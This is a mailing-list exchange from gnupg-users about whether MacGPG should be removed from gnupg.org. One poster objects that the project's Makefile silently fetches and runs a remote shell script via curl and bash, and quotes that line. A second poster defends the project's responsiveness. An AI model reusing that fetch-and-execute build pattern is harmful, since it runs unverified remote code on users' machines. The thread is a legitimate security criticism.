If you have concerns or suggestions then the best thing would be to contact Luke Le, Steve or the other support staff on
http://support.gpgtools.org/ Sandeep Murthy s.mur...@mykolab.com > Begin forwarded message: > > Subject: Re: Please remove MacGPG from gnupg.org due to serious security > concerns > From: Sandeep Murthy <s.mur...@mykolab.com> > Date: 16 February 2015 23:16:06 GMT > Cc: js-gnupg-us...@webkeks.org > To: gnupg-users@gnupg.org > > Hi > > I think this is an exaggeration. I have been using MacGPG and the > GPG Tools support forum for quite some time, and have brought a > number of issues to their attention, including a couple of security > related ones, like making their key fingerprints more visible. > > They do care about security and are very responsive to posts on the > GPG Tools support forum > > http://support.gpgtools.org/ > > The GitHub issues page for MacGPG is not the main places where > issues are raised, it’s actually the support forum, where there are > lots of other resources as well. > > Sandeep Murthy > s.mur...@mykolab.com > >> On 16 Feb 2015, at 21:48, Jonathan Schleifer <js-gnupg-us...@webkeks.org> >> wrote: >> >> Hi! >> >> I hereby request that MacGPG gets removed from gnupg.org due to serious >> security concerns. Basically, the first thing the Makefile in all their >> repos / tarballs does is this: >> >> @bash -c "$$(curl -fsSL >> https://raw.github.com/GPGTools/GPGTools_Core/master/newBuildSystem/prepare-core.sh)" >> >> So you type make not expecting anything bad (you verified the checksum and >> everything), but you just executed remote code. Great. And they even hide it >> from you by prefixing it with @, which is downright evil. So you never >> notice unless you look at the Makefile. Currently, that script clones >> another common repo using the unverified git:// protocol (because, why use >> submodules if you can do it in an insecure way?), but obviously, that can >> change any minute and could change just for certain IPs etc. >> >> The developer(s) don't allow any issues on GitHub, so I tried contacting >> them by other means (e.g. Twitter), only to get ignored. They clearly don't >> care about security. >> >> In any case, somebody who does something like this clearly doesn't care >> about security the least. The potential for backdoors is extremely high and >> I think nobody should be using any software written by this developer / >> these developer(s), as they clearly demonstrated that they couldn't care >> less about your security. >> >> I don't feel comfortable that the majority of Mac users are using this >> software which doesn't care for security at all, but is used for extremely >> security sensitive tasks. I guess this is because gnupg.org recommends it >> and therefore people think it's safe. I think gnupg.org should do the >> contrary instead and strongly discourage using it. >> >> -- >> Jonathan >> >> >> _______________________________________________ >> Gnupg-users mailing list >> Gnupg-users@gnupg.org >> http://lists.gnupg.org/mailman/listinfo/gnupg-users >
signature.asc
Description: Message signed with OpenPGP using GPGMail
_______________________________________________ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
